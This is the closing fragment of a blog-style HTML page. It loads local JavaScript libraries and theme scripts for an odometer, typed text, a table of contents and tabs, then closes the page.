<script src="/js/libs/odometer.min.js"></script>

    
<link rel="stylesheet" href="/assets/odometer-theme-minimal.css">




  
<script src="/js/libs/Typed.min.js"></script>

  
<script src="/js/plugins/typed.js" type="module"></script>









<div class="post-scripts" data-swup-reload-script>
    
        
<script src="/js/tools/tocToggle.js" type="module"></script>

<script src="/js/layouts/toc.js" type="module"></script>

<script src="/js/plugins/tabs.js" type="module"></script>

    
</div>


</body>
</html>
